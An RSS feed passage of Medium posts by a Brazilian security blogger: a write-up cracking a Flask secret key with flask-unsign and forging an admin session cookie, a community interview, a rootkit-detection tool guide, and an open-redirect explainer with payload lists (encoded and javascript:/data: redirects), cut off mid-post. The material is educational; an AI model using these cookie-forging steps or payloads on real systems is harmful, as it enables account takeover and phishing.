src="https://cdn.embedly.com/widgets/media.html?src=https%3A%2F%2Fgiphy.com%2Fembed%2F3og0ILLVvPp8d64Jd6%2Ftwitter%2Fiframe&amp;display_name=Giphy&amp;url=https%3A%2F%2Fmedia.giphy.com%2Fmedia%2Fv1.Y2lkPTc5MGI3NjExcnhlamh4Z3g3ZjlxdnJlcXZtczZzNGFwMzNib2czZGZ2OWFoZGhwZCZlcD12MV9pbnRlcm5hbF9naWZfYnlfaWQmY3Q9Zw%2F3og0ILLVvPp8d64Jd6%2Fgiphy.gif&amp;image=https%3A%2F%2Fmedia4.giphy.com%2Fmedia%2Fv1.Y2lkPTc5MGI3NjExeG9hb214cWM1dXZqcTlkbDB1cnZtbXlzenN6MjQ4MzB1MWEwb3ZhZSZlcD12MV9pbnRlcm5hbF9naWZfYnlfaWQmY3Q9Zw%2F3og0ILLVvPp8d64Jd6%2Fgiphy.gif&amp;key=a19fcc184b9711e1b4764040d3dc5c07&amp;type=text%2Fhtml&amp;schema=giphy" width="435" height="435" frameborder="0" scrolling="no"><a href="https://medium.com/media/542b78453efdf23493842d3d4f384e06/href">https://medium.com/media/542b78453efdf23493842d3d4f384e06/href</a></iframe><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*fHpHkXp27ckWczh74fF3jw.png" /></figure><img src="https://medium.com/_/stat?event=post.clientViewed&referrerSource=full_rss&postId=bc5ca0dc1dd5" width="1" height="1" alt="">]]></content:encoded>
        </item>
        <item>
            <title><![CDATA[ ]]></title>
            <link>https://medium.com/@morganbinbash/-25027f11f71e?source=rss-ef108b0e5738------2</link>
            <guid isPermaLink="false">https://medium.com/p/25027f11f71e</guid>
            <category><![CDATA[pentesting]]></category>
            <category><![CDATA[cybersecurity]]></category>
            <category><![CDATA[bug-bounty]]></category>
            <category><![CDATA[cyber-threat-intelligence]]></category>
            <dc:creator><![CDATA[Morgan Bin Bash]]></dc:creator>
            <pubDate>Sat, 16 Mar 2024 04:10:11 GMT</pubDate>
            <atom:updated>2024-03-16T04:10:11.626Z</atom:updated>
            <content:encoded><![CDATA[<p>𝘘𝘶𝘢̃𝘰 𝘴𝘦𝘨𝘶𝘳𝘰 𝘦́ 𝘶𝘮 𝘧𝘭𝘢𝘴𝘬 𝘤𝘰𝘰𝘬𝘪𝘦?</p><iframe src="https://cdn.embedly.com/widgets/media.html?src=https%3A%2F%2Fgiphy.com%2Fembed%2FRpl1sod1vCXK0L2SUN%2Ftwitter%2Fiframe&amp;display_name=Giphy&amp;url=https%3A%2F%2Fmedia.giphy.com%2Fmedia%2Fv1.Y2lkPTc5MGI3NjExeWJyZWNwbGZtdmM2bGYzZG93d3Y3MjBwaGs1NmYwaGFpNXpsMjN6ZiZlcD12MV9pbnRlcm5hbF9naWZfYnlfaWQmY3Q9Zw%2FRpl1sod1vCXK0L2SUN%2Fgiphy.gif&amp;image=https%3A%2F%2Fmedia1.giphy.com%2Fmedia%2Fv1.Y2lkPTc5MGI3NjExMjZoZGVla3AyM3g4djRlaW56NDdnM3RldGlkY2tpYnJpZzc2bmw3ayZlcD12MV9pbnRlcm5hbF9naWZfYnlfaWQmY3Q9Zw%2FRpl1sod1vCXK0L2SUN%2Fgiphy.gif&amp;key=a19fcc184b9711e1b4764040d3dc5c07&amp;type=text%2Fhtml&amp;schema=giphy" width="435" height="246" frameborder="0" scrolling="no"><a href="https://medium.com/media/0652e26cce80937c25c7d946d6085945/href">https://medium.com/media/0652e26cce80937c25c7d946d6085945/href</a></iframe><p><a href="https://linktr.ee/morganbinbash">@morganbinbash | Linktree</a></p><h4>𝘋𝘦𝘴𝘤𝘳𝘪𝘤̧𝘢̃𝘰 𝘥𝘢 𝘝𝘶𝘭𝘯𝘦𝘳𝘢𝘣𝘪𝘭𝘪𝘥𝘢𝘥𝘦:</h4><p>Quando todas as seguintes condições são atendidas, uma resposta contendo dados destinados a um cliente pode ser armazenada em cache e posteriormente enviada por um proxy a outros clientes.<br>Se o proxy também armazena os cabeçalhos Set-Cookie, ele pode enviar o cookie de sessão de um cliente para outros clientes.<br>A gravidade dessa vulnerabilidade depende do uso da sessão pela aplicação e do comportamento do proxy em relação aos cookies.<br>O risco está associado ao cumprimento de todas essas condições:</p><p>1- A aplicação deve estar hospedada atrás de um proxy de cache que não remova cookies nem ignore respostas com cookies.</p><p>2- A aplicação define session.permanent = True.</p><p>3- A aplicação não acessa ou modifica a sessão em nenhum momento durante uma solicitação.</p><p>4- SESSION_REFRESH_EACH_REQUEST está habilitado (o padrão).</p><p>5- A aplicação não define um cabeçalho Cache-Control para indicar que uma página é privada ou não deve ser armazenada em cache.</p><p>Essa vulnerabilidade ocorre porque versões vulneráveis do Flask só definem o cabeçalho Vary: Cookie quando a sessão é acessada ou modificada, não quando ela é atualizada (reenviada para atualizar a expiração) sem ser acessada ou modificada.</p><h4>Versões Afetadas e Corrigidas:</h4><p>Versões afetadas: &gt;= 2.3.0, &lt; 2.3.2 e &lt; 2.2.5.<br>Versões corrigidas: 2.3.2 e 2.2.51.</p><p>1. Encontre a chave secreta<br>Utilizaremos uma máquina virtual para utilizar o sistema operacional Ubuntu. <br>O Ubuntu é ótimo porque o Python vem pré-instalado e possui pacotes que faltam no Windows. <br>Depois de abusar do Google, encontrei o flask-unsign, que é uma ferramenta que nos ajudará a descobrir a chave secreta.</p><p>Vamos instalar o flask-unsign.</p><p>$ pip3 install flask-unsign</p><p>Ok, vamos ver como funciona.</p><p>Vamos inserir um cookie “butter” (parte da lista de nomes de cookies). <br>Então você deverá ver uma página que diz. De qualquer forma, basta inspecionar a página e copiar o valor do cookie.</p><p>$ flask-unsign — unsign — cookie &lt; cookie.txt — wordlist wordlist.txt</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/592/1*FbuKRfOx6ypm_EGp0BCyEw.png" /></figure><h4>wordlist.txt</h4><figure><img alt="" src="https://cdn-images-1.medium.com/max/686/1*QcBfnM8Yexz5pulQNsrI4Q.png" /></figure><p>$ flask-unsign — unsign — cookie &lt; cookie.txt</p><p>Olhei para o código e percebi que o cookie.txt continha um valor de cookie. Então decidi fazer meu próprio cookie.txt com um valor de cookie dentro:</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/673/1*YqeELnCCmh18UNe9dgglrA.png" /></figure><p>O valor do cookie que escondi em cookie.txt é aquele acima, onde digitei ‘butter’.</p><p>Também criei um wordlist.txt com os nomes dos cookies encontrados em server.py (isso servirá como minha lista de palavras para forçar a chave secreta). Veja na seção de referências na parte inferior.</p><p>Certifique-se de estar na pasta correta que contém cookie.txt e wordlist.txt… então você pode inserir este comando.</p><pre>$ flask-unsign --unsign --cookie &lt; cookie.txt --wordlist wordlist.txt</pre><figure><img alt="" src="https://cdn-images-1.medium.com/max/672/1*reMtlrpQ1UMgwcmR1JSL3g.png" /></figure><p>Depois de 1 segundo agonizante, você leva um tapa com a chave secreta!! No meu caso, foi ‘butter’.</p><p>MANEIRA MAIS RÁPIDA QUE USEI PARA ENCONTRAR A CHAVE SECRETA</p><pre>$ flask-unsign --unsign --server &#39;http://website:65344/&#39; --wordlist wordlist.tx</pre><p><a href="https://github.com/noraj/flask-session-cookie-manager">GitHub - noraj/flask-session-cookie-manager: :cookie: Flask Session Cookie Decoder/Encoder</a></p><p>Exemplo de saída noraj flask_session_cookie_manager:</p><p>python3 flask_session_cookie_manager3.py encode -s butter -t “{‘very_auth’:’admin’}”</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/684/1*z5YhA1fnJYvoQsm5nYG7_g.png" /></figure><h4>Use a chave secreta para gerar nosso próprio cookie<br>Com a chave secreta, o resto será muito fácil. É hora de criar nosso próprio cookie de sessão!</h4><figure><img alt="" src="https://cdn-images-1.medium.com/max/1009/1*4VSDKCMRlChge-jeyVYvlg.png" /></figure><p>Insira nosso cookie no site para substituir o valor do cookie<br>Copie e cole aquele bad boy no valor do cookie.<br>Recarregue a página para receber a sessão.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*ohlIlsIVcDMr0WTLgJWJ4w.png" /></figure><p><a href="https://beacons.ai/morganbinbash">https://beacons.ai/morganbinbash</a></p><img src="https://medium.com/_/stat?event=post.clientViewed&referrerSource=full_rss&postId=25027f11f71e" width="1" height="1" alt="">]]></content:encoded>
        </item>
        <item>
            <title><![CDATA[  —    ́]]></title>
            <link>https://medium.com/@morganbinbash/%CC%81-ce9cb2314846?source=rss-ef108b0e5738------2</link>
            <guid isPermaLink="false">https://medium.com/p/ce9cb2314846</guid>
            <category><![CDATA[hackthebox]]></category>
            <category><![CDATA[cybersecurity]]></category>
            <category><![CDATA[pentesting]]></category>
            <dc:creator><![CDATA[Morgan Bin Bash]]></dc:creator>
            <pubDate>Thu, 14 Mar 2024 21:13:32 GMT</pubDate>
            <atom:updated>2024-03-17T23:19:15.568Z</atom:updated>
            <content:encoded><![CDATA[<h3>𝐌𝐢𝐬𝐭 𝐑𝐚𝐯𝐞𝐧 — 𝐨 𝐜𝐨𝐫𝐯𝐨 𝐝𝐚 𝐧𝐞́𝐯𝐨𝐚</h3><figure><img alt="" src="https://cdn-images-1.medium.com/max/332/1*KYBvBzukmlCXB3LQxd5Jzw.jpeg" /></figure><p>Estou entrevistando nosso caro “Mist”, com o objetivo de que conheçam um pouco mais dessa pessoa muito agradável e querida por muitas pessoas e comunidades da área de cibersegurança. Mist é uma referência de força de vontade e determinação, além de ser uma pessoa sempre pronta a colaborar com o próximo, seja com sua persona marcante como bom amigo, estudante e profissional. Afirmo e assumo toda a responsabilidade jurídica do conteúdo desta edição, pois tudo foi apresentado ao entrevistado mediante sua aprovação para publicação nesta plataforma. Com a aprovação do mesmo, apreciem e conheçam um pouco mais dessa figura muito querida.</p><h4>Quem é MistRaven:</h4><p>Bem, a origem do meu nick veio de estudos do autoconhecimento, mais especificamente do Xamanismo. O corvo é meu animal de poder, além de ser um símbolo de magia e mistério. O “Mist” veio da névoa, queria que fosse algo marcante, então decidi por “MIST”. Sou brasileiro, tenho 23 anos. Eu me colocaria na posição de entusiasta, mas ao mesmo tempo apaixonado. Penso como profissional e PCD (Pessoa com Deficiência) que a área de informática e, principalmente, cibersegurança devem ser acessíveis e inclusivas para todos, independentemente de barreiras físicas ou quaisquer outras.</p><h4>O que despertou seu desejo de entrar no segmento de segurança digital?</h4><p>O que despertou, acredito que, como para a maioria de nós amantes desse mundo de 0 e 1, é simplesmente buscar entender como tudo funciona. Lembro-me de ter conhecido vídeos muito antigos de um professor chamado Marco Aurélio Thompson e de ficar fascinado com as coisas que ele demonstrava, como o NMAP e como as portas funcionavam, como os exploits eram feitos, mas principalmente queria buscar respostas do porquê não se falava sobre isso na época. Lembro-me de ser criança e acompanhar os vídeos dele. Eu explorava muito softwares como Turkojan 4, bons tempos.</p><p>Eu acredito que sair da zona de conforto… Lembro-me de quando tinha 18 anos e queria aprender sobre Linux. Tinha medo de explorar algo novo, tinha medo do terminal. Eu lia muito sobre tudo que envolvia a parte de SEC, mas tinha sempre aquela curiosidade que me movia. Lembro de ver vídeos do John Hammond fazendo CTF e pensei comigo, se ele, dedicado como é, consegue, eu também consigo. Uma das minhas maiores realizações como pessoa foi ter auxiliado pessoas a descobrir que, assim como eu, gostavam da área de info. Sempre gostei de ajudar as pessoas nos primeiros passos e sempre gostei de unir as pessoas. Tive muito auxílio e apoio do meu mentor, Fabiano Duarte, que me aconselhou sempre a ter uma mente forte e evoluir passo a passo, curtindo a jornada. Sou imensamente grato a ele por me ensinar a ter resiliência, me mostrar o caminho das pedras no mundo Linux</p><h4>Dicas do Mist:</h4><p>fazer sempre uma busca extensa por boas referências de livros e documentações, organizar bem o seu ambiente a ponto de que se sinta confortável trabalhando com ele e sempre buscar se tornar o mais eficiente possível com as ferramentas que tens, sempre buscar mais.</p><h4>Quais referências de livros que leu ou está lendo, se desejar falar sobre cursos que está fazendo.</h4><p>Sobre livros que eu recomendo “Create Your Own Games with Python” e “Programação Shell Linux — 13ª Edição” de Julio Neves.</p><h4>Fale um pouco dos objetivos e metas no campo de cibersegurança.</h4><p>Minhas metas são tirar certificações LPI e, no futuro, talvez DCPT, e ter uma base sólida, principalmente ajudar mais pessoas a descobrir mais deste mundo ao qual me fascinou desde criança.</p><h4>Cite sua filosofia.</h4><p>Sigo como filosofia sempre se desafiar, estar sempre disposto a ajudar, sempre partilhar conhecimento e sempre manter um sorriso no rosto. Jamais permitir que pessoas que estão ao seu redor te digam que você não tem força para persistir ou que é louco por querer entrar no meio de SEC. Esteja sempre pronto para se desafiar, buscar novas alternativas, tentar sempre ir o mais profundo possível em uma área de conhecimento, seja ela Linux, quebra de hashes ou outros.</p><h4>Qual experiência tornou-se marcante durante toda sua trajetória de estudos?</h4><p>Ter conhecido meu mentor pessoalmente. Lembro-me desse dia como se fosse ontem. Conversamos muito e ele me ensinou comandos os quais explodiram minha cabeça e me deu</p><p>um caminho para seguir. Com relação a certificações e carreira, não só esse momento, como um outro muito especial: ter conhecido Kadu Zambelli pessoalmente. Além de ser uma pessoa que eu admiro, ele e o pessoal do Alquymia, essa comunidade que eu amo, me ajudaram a progredir e muito. Sou muito grato a todos os membros pelo carinho e amor.</p><h4>Fale um pouco das comunidades que participa ou gostaria de indicar.</h4><p>As comunidades que eu recomendo são Menina de Cibersegurança, Alquymia e Guia Anônima. Amo, graças a eles, fui literalmente salvo. Estava com sérios problemas, desanimado, mas eles me mostraram através do carinho e do acolhimento que recebi. Sou hoje uma pessoa mais feliz e de bem comigo mesmo por causa do apoio de vocês. Muita Gratidão. Amo vocês.</p><h4>Deixe uma dica que possa colaborar com estudos de quem está começando a estudar sobre cibersegurança.</h4><p>Uma dica é nunca deixar de buscar maneiras diferentes de aprender, conectar-se com pessoas que te ajudem a trilhar um caminho e, principalmente, não tenha medo. Tenha uma base sólida, foque em entender cada detalhe de um assunto, seja redes, sistemas operacionais ou vulnerabilidades.</p><h4>Faça suas considerações.</h4><p>Queria agradecer à minha família pelo apoio, meu mentor por sempre estar comigo e, principalmente, aos amigos que conheci nesta jornada por terem salvado a minha vida. Estudar segurança me mostrou que precisamos sempre proteger aquilo que mais importa para nós e as pessoas que conhecemos me ensinaram muito sobre o poder de uma amizade que pode te transformar. Amo cada um de vocês, meus amigos. Fico ainda mais feliz quando dizem que eu os ajudei de alguma forma, seja com ajudas técnicas ou não. Amo cada um de vocês. Contem comigo sempre.</p><p>- MistRaven — O Corvo da Névoa Binária</p><p>E lembrem-se: “Os corvos negros da alquimia guardam o segredo da transformação, voando alto em busca da essência que transmuta o ordinário em extraordinário”.</p><p>.mistraven</p><p>@ 355162002966052875</p><p><a href="https://discord.com/channels/@me/1101674994125262939">Discord - A New Way to Chat with Friends &amp; Communities</a></p><iframe src="https://cdn.embedly.com/widgets/media.html?src=https%3A%2F%2Fgiphy.com%2Fembed%2F12W5Sg2koWYnwA%2Ftwitter%2Fiframe&amp;display_name=Giphy&amp;url=https%3A%2F%2Fmedia.giphy.com%2Fmedia%2Fv1.Y2lkPTc5MGI3NjExMGIzNHNtdGpzb3Q3bmpnd2FjbTlneTQxeTlsb3B1ZGo2dDJkajhhcyZlcD12MV9pbnRlcm5hbF9naWZfYnlfaWQmY3Q9Zw%2F12W5Sg2koWYnwA%2Fgiphy.gif&amp;image=https%3A%2F%2Fmedia4.giphy.com%2Fmedia%2Fv1.Y2lkPTc5MGI3NjExMjN5bGhldm9leWpsYnlwZWVzanFqY2MxZ2JjbnZvYnNhbzdiZ215cSZlcD12MV9pbnRlcm5hbF9naWZfYnlfaWQmY3Q9Zw%2F12W5Sg2koWYnwA%2Fgiphy.gif&amp;key=a19fcc184b9711e1b4764040d3dc5c07&amp;type=text%2Fhtml&amp;schema=giphy" width="435" height="326" frameborder="0" scrolling="no"><a href="https://medium.com/media/04b591c2670fd6391c25811994d189aa/href">https://medium.com/media/04b591c2670fd6391c25811994d189aa/href</a></iframe><p><a href="https://beacons.ai/morganbinbash">https://beacons.ai/morganbinbash</a></p><img src="https://medium.com/_/stat?event=post.clientViewed&referrerSource=full_rss&postId=ce9cb2314846" width="1" height="1" alt="">]]></content:encoded>
        </item>
        <item>
            <title><![CDATA[  ]]></title>
            <link>https://medium.com/@morganbinbash/-9d5b82422b35?source=rss-ef108b0e5738------2</link>
            <guid isPermaLink="false">https://medium.com/p/9d5b82422b35</guid>
            <category><![CDATA[pentesting]]></category>
            <category><![CDATA[cybersecurity]]></category>
            <category><![CDATA[security-engineering]]></category>
            <dc:creator><![CDATA[Morgan Bin Bash]]></dc:creator>
            <pubDate>Thu, 07 Mar 2024 04:53:09 GMT</pubDate>
            <atom:updated>2024-03-07T04:53:09.854Z</atom:updated>
            <content:encoded><![CDATA[<figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*Z4QcXBIAtOARVXLtBSduuQ.jpeg" /></figure><p><a href="https://beacons.ai/morganbinbash">https://beacons.ai/morganbinbash</a></p><p>𝐀𝐛𝐨𝐮𝐭 𝐛𝐞𝐡𝐚𝐯𝐢𝐨𝐫:</p><p>1- Unauthorized control:<br>Rootkits give the attacker almost complete control over the operating system, allowing them to perform actions without the user’s consent.</p><p>2- Concealment of malicious activities:<br>Rootkits can modify kernel functions to hide their presence and activities. This makes it difficult for users and administrators to detect the presence of the rootkit.</p><p>3- Deactivation of security software:<br>Rootkits can easily disable or damage your antivirus software, making your system even more vulnerable to other types of malware.</p><p>4- Exploitation of vulnerabilities:<br>Rootkits can exploit unpatched vulnerabilities to infiltrate a system.</p><p>5- System instability:<br>Rootkits, especially those that operate at the kernel level, can lead to system crashes and instability.</p><p>6- Permanence:<br>Once installed, rootkits can remain undetected for years.</p><p>7- It is important to note that removing a rootkit can be very difficult. If your kernel is compromised, you can’t trust anything it says about your files.</p><p>𝖬𝖺𝗇𝗎𝖺𝗅 𝖨𝗇𝗌𝗉𝖾𝖼𝗍𝗂𝗈𝗇:</p><p>Regularly review system logs (e.g., /var/log/messages, /var/log/syslog) for any suspicious activities or anomalies.<br>Monitor system performance and resource usage for unexpected behavior.</p><p>Detecting and removing rootkits on a Linux system can be challenging because rootkits are designed to hide themselves and their activities. <br>However, several tools and techniques can help identify and eliminate rootkits. Here are some commonly used tools:</p><p>𝟏) 𝐫𝐤𝐡𝐮𝐧𝐭𝐞𝐫 (𝐑𝐨𝐨𝐭𝐤𝐢𝐭 𝐇𝐮𝐧𝐭𝐞𝐫):</p><p>Rootkit Hunter is a popular open-source tool specifically designed for Unix-like systems.<br>It scans for rootkits, backdoors, and possible local exploits.<br>Installation: <br>(on Debian/Ubuntu) <br>sudo apt-get install rkhunter <br>or <br>(on CentOS/RHEL).<br>sudo yum install rkhunter <br>Usage: <br>sudo rkhunter — check</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/995/1*0ZC_BuWQS9dRs3wOd1r8yg.png" /></figure><p>𝟐) 𝐜𝐡𝐤𝐫𝐨𝐨𝐭𝐤𝐢𝐭:</p><p>Similar to Rootkit Hunter, chkrootkit is a simple and effective tool for detecting rootkits on Linux systems.<br>Installation: <br>(on Debian/Ubuntu)<br>sudo apt-get install chkrootkit <br>or <br>(on CentOS/RHEL)<br>sudo yum install chkrootkit <br>Usage: <br>sudo chkrootkit</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/795/1*tkqoBMtrtD8Sabgvj-pZ5A.png" /></figure><p>Chkrootkit and rkhunter from source:<br>Sometimes, it’s a good idea to download the latest versions directly from their official websites and compile them manually for the most up-to-date detection capabilities.</p><p>𝟑) 𝐋𝐲𝐧𝐢𝐬:</p><p>While not exclusively focused on rootkit detection, Lynis is a security auditing tool that can help identify vulnerabilities, including signs of compromise.<br>Installation: <br>Download from the official website:</p><p><a href="https://cisofy.com/downloads/lynis/">Download page for Lynis</a></p><p>Usage: <br>sudo lynis audit system</p><p>𝟒) 𝐂𝐥𝐚𝐦𝐀𝐕:</p><p>ClamAV is an open-source antivirus engine that can be used to scan for malware, including rootkits.<br>Installation: <br>(on Debian/Ubuntu)<br>sudo apt-get install clamav <br>or <br>(on CentOS/RHEL)<br>sudo yum install clamav <br>Usage: <br>sudo clamscan -r /</p><p>Remember that no single tool can guarantee 100% detection of rootkits, and it’s advisable to use a combination of tools and manual inspection to enhance security. <br>Additionally, keeping your system and software up-to-date, practicing good security hygiene, and implementing proper access controls are crucial components of a comprehensive security strategy.</p><iframe src="https://cdn.embedly.com/widgets/media.html?src=https%3A%2F%2Fgiphy.com%2Fembed%2F077i6AULCXc0FKTj9s%2Ftwitter%2Fiframe&amp;display_name=Giphy&amp;url=https%3A%2F%2Fmedia.giphy.com%2Fmedia%2Fv1.Y2lkPTc5MGI3NjExcDJ2dmk2Z2Y0eXRhb2pnd3V1MnNhMGhvbXlhYm9wNjhrcXJtM3p4MyZlcD12MV9pbnRlcm5hbF9naWZfYnlfaWQmY3Q9Zw%2F077i6AULCXc0FKTj9s%2Fgiphy.gif&amp;image=https%3A%2F%2Fmedia1.giphy.com%2Fmedia%2Fv1.Y2lkPTc5MGI3NjExdm9weDI5dzQ2dnJpMjVlcHE0ODZ4YXQ1emludjExOG01cXZ6NjhjNiZlcD12MV9pbnRlcm5hbF9naWZfYnlfaWQmY3Q9Zw%2F077i6AULCXc0FKTj9s%2Fgiphy.gif&amp;key=a19fcc184b9711e1b4764040d3dc5c07&amp;type=text%2Fhtml&amp;schema=giphy" width="435" height="326" frameborder="0" scrolling="no"><a href="https://medium.com/media/332558524344ff0054cbf62ed48b5aeb/href">https://medium.com/media/332558524344ff0054cbf62ed48b5aeb/href</a></iframe><p><a href="https://linktr.ee/morganbinbash">@morganbinbash | Linktree</a></p><img src="https://medium.com/_/stat?event=post.clientViewed&referrerSource=full_rss&postId=9d5b82422b35" width="1" height="1" alt="">]]></content:encoded>
        </item>
        <item>
            <title><![CDATA[  ]]></title>
            <link>https://medium.com/@morganbinbash/-46d5d16114c8?source=rss-ef108b0e5738------2</link>
            <guid isPermaLink="false">https://medium.com/p/46d5d16114c8</guid>
            <category><![CDATA[frontend]]></category>
            <category><![CDATA[cybersecurity]]></category>
            <category><![CDATA[bug-bounty]]></category>
            <category><![CDATA[pentesting]]></category>
            <dc:creator><![CDATA[Morgan Bin Bash]]></dc:creator>
            <pubDate>Sat, 02 Mar 2024 01:58:04 GMT</pubDate>
            <atom:updated>2024-03-02T12:36:35.554Z</atom:updated>
            <content:encoded><![CDATA[<figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*eMTQq5PFzMWR2l2PJlUIpQ.png" /></figure><p><a href="https://beacons.ai/morganbinbash">https://beacons.ai/morganbinbash</a></p><p>Open redirection is a security vulnerability that occurs when a web application or website allows an attacker to redirect users to an arbitrary external URL.<br>This vulnerability is typically exploited by manipulating input parameters in URLs or other user-controllable data to redirect them to a malicious website.<br>The impact of open redirect vulnerabilities can vary, but attackers often use them for phishing attacks. By tricking users into clicking a seemingly legitimate link that redirects to a malicious website, attackers may attempt to steal sensitive information such as login credentials or financial details.<br>Here is a simple example to illustrate the concept:</p><p>Suponha que um site tenha uma página de login com um parâmetro de redirecionamento na URL, como este:</p><p><a href="https://www.example.com/login?redirect=https://malicious-site.com">https://www.example.com/login?redirect=https://malicious-site.com</a></p><p>Se o aplicativo da web não validar e higienizar adequadamente o parâmetro “redirecionar”, um invasor poderá criar um link malicioso e induzir os usuários a clicar nele. Por exemplo:</p><p><a href="https://www.example.com/login?redirect=https://malicious-site.com">https://www.example.com/login?redirect=https://malicious-site.com</a></p><p>Nesse caso, os usuários podem pensar que estão clicando em um link legítimo para a página de login do site original, mas na verdade estão sendo redirecionados para o site malicioso do invasor.</p><p>Para evitar vulnerabilidades de redirecionamento aberto, os desenvolvedores web devem validar e higienizar as entradas do usuário, especialmente aquelas usadas para redirecionamento. Além disso, é aconselhável usar uma abordagem de lista de permissões, permitindo apenas URLs específicos e confiáveis ​​para redirecionamento, em vez de depender de informações fornecidas pelo usuário. Auditorias e testes regulares de segurança podem ajudar a identificar e resolver possíveis vulnerabilidades em aplicativos da web.</p><iframe src="https://cdn.embedly.com/widgets/media.html?src=https%3A%2F%2Fwww.youtube.com%2Fembed%2Fr1bGimnjWcM%3Ffeature%3Doembed&amp;display_name=YouTube&amp;url=https%3A%2F%2Fwww.youtube.com%2Fwatch%3Fv%3Dr1bGimnjWcM&amp;image=https%3A%2F%2Fi.ytimg.com%2Fvi%2Fr1bGimnjWcM%2Fhqdefault.jpg&amp;key=a19fcc184b9711e1b4764040d3dc5c07&amp;type=text%2Fhtml&amp;schema=youtube" width="854" height="480" frameborder="0" scrolling="no"><a href="https://medium.com/media/a41f77ca0db1cc49218257894f045f63/href">https://medium.com/media/a41f77ca0db1cc49218257894f045f63/href</a></iframe><p><a href="https://github.com/WebGoat/WebGoat/releases">Releases · WebGoat/WebGoat</a></p><p>Testing open redirects on a website is a crucial part of evaluating web security. Open redirects occur when a website allows external input to redirect users to different URLs and, if not properly validated, can be exploited by attackers for phishing or other malicious purposes.<br>Here’s a basic guide on how to test open redirects:</p><p>Permission:<br>make sure you have explicit permission to test the site for security vulnerabilities.<br>Unauthorized testing can lead to legal consequences.</p><p>Test environment:<br>Set up a controlled testing environment or use a website designed for hacking and ethical testing, such as OWASP’s WebGoat or DVWA (Damn Vulnerable Web Application).</p><p>Steps to test open redirects:<br>Identify user-controllable input:</p><p>Look for parameters or input fields where a URL or part of a URL can be manipulated.<br>Common parameters include redirect, url, next, etc.<br>Submit valid entry:</p><p>Initially, test with a valid URL to ensure the redirect functionality is working as expected.<br>Submit malicious input:</p><p>Inject a malicious URL or attempt to manipulate the input to redirect to an external website.</p><p>Example: <a href="https://example.com/redirect?redirectURL=http://malicious-site.com">https://example.com/redirect?redirectURL=http://malicious-site.com</a></p><p>Check for redirection:<br>Observe browser behavior. If it redirects to the provided URL, it may indicate an open redirect vulnerability.</p><p>Review the answer:<br>Use tools like browser developer tools or intercepting proxies (e.g. Burp Suite) to inspect HTTP responses.<br>Look for the Location header in the response, which indicates the redirect URL.</p><p>Test different HTTP methods:<br>Try different HTTP methods (GET, POST, etc.) to see if the open redirect vulnerability persists between methods.</p><p>Check whitelist/blacklist:<br>Some websites implement whitelists or blacklists for allowed redirect URLs. Test whether these mechanisms are in place and effective.</p><p>Test for URL Encoding:<br>Check whether the site performs URL encoding on user input. Try encoding characters (%20,%3C,%3E, etc.) to see if this affects the redirection.</p><p>Automated verification:<br>Use automated security testing tools such as OWASP ZAP or Burp Suite to check for open redirection vulnerabilities.</p><p>Check security controls:<br>Verify that the site employs security controls, such as using a safelist of whitelisted domains or validating the redirect URL format.</p><iframe src="https://cdn.embedly.com/widgets/media.html?src=https%3A%2F%2Fgiphy.com%2Fembed%2FMF0QiCa9JPEI6HiaCK%2Ftwitter%2Fiframe&amp;display_name=Giphy&amp;url=https%3A%2F%2Fmedia.giphy.com%2Fmedia%2Fv1.Y2lkPTc5MGI3NjExdnhpZjRwM2x4Z3dldmFrMW5mZG5nc2hmeHFudXJuYXFvc3IydjN2eiZlcD12MV9pbnRlcm5hbF9naWZfYnlfaWQmY3Q9Zw%2FMF0QiCa9JPEI6HiaCK%2Fgiphy.gif&amp;image=https%3A%2F%2Fmedia4.giphy.com%2Fmedia%2Fv1.Y2lkPTc5MGI3NjExc2p0Z2J0aGNlOWQzYWpsODJjOXhqYnVkMXpkeDZ3bTd4YWNkYzhhcCZlcD12MV9pbnRlcm5hbF9naWZfYnlfaWQmY3Q9Zw%2FMF0QiCa9JPEI6HiaCK%2Fgiphy.gif&amp;key=a19fcc184b9711e1b4764040d3dc5c07&amp;type=text%2Fhtml&amp;schema=giphy" width="435" height="383" frameborder="0" scrolling="no"><a href="https://medium.com/media/8fbbd3ab2c3fcb82d480cec8b12e057b/href">https://medium.com/media/8fbbd3ab2c3fcb82d480cec8b12e057b/href</a></iframe><p>When testing for open redirects using Burp Suite, you can use various payloads to check if the application is vulnerable to this type of attack. <br>Open redirects typically involve manipulating URL parameters to redirect users to arbitrary external domains. <br>Here are some common payloads and techniques you can use in Burp Suite:</p><p>1- 𝑺𝒊𝒎𝒑𝒍𝒆 𝑼𝑹𝑳 𝒄𝒉𝒂𝒏𝒈𝒆𝒔:<br><a href="https://www.example.com?redirect=https://malicious-site.com">https://www.example.com?redirect=https://malicious-site.com</a><br><a href="https://www.example.com/redirect?url=https://malicious-site.com">https://www.example.com/redirect?url=https://malicious-site.com</a></p><p>2- 𝑼𝑹𝑳 𝒆𝒏𝒄𝒐𝒅𝒊𝒏𝒈:<br>%68%74%74%70%3a%2f%2f%6d%61%6c%69%63%69%6f%75%73%2d%73%69%74%65%2e%63%6f%6d (URL-encoded “<a href="https://malicious-site.com">https://malicious-site.com</a>&quot;)</p><p>3- 𝑹𝒆𝒍𝒂𝒕𝒊𝒗𝒆 𝒑𝒂𝒕𝒉𝒔:<br>/redirect?url=<a href="https://malicious-site.com">https://malicious-site.com</a><br>../../redirect?url=<a href="https://malicious-site.com">https://malicious-site.com</a></p><p>4- 𝑫𝒐𝒖𝒃𝒍𝒆 𝑼𝑹𝑳 𝒆𝒏𝒄𝒐𝒅𝒊𝒏𝒈:<br>%252e%252e%252fredirect%253furl%253dhttps%253a%252f%252fmalicious-site.com</p><p>5- 𝑱𝒂𝒗𝒂𝑺𝒄𝒓𝒊𝒑𝒕 𝒑𝒂𝒚𝒍𝒐𝒂𝒅𝒔:<br>javascript:window.location=’<a href="https://malicious-site.com&#39;">https://malicious-site.com&#39;</a>;<br>data:text/html,&lt;script&gt;window.location=’<a href="https://malicious-site.com&#39;">https://malicious-site.com&#39;</a>;&lt;/script&gt;</p><p>6- 𝑫𝒂𝒕𝒂 𝑼𝑹𝑰 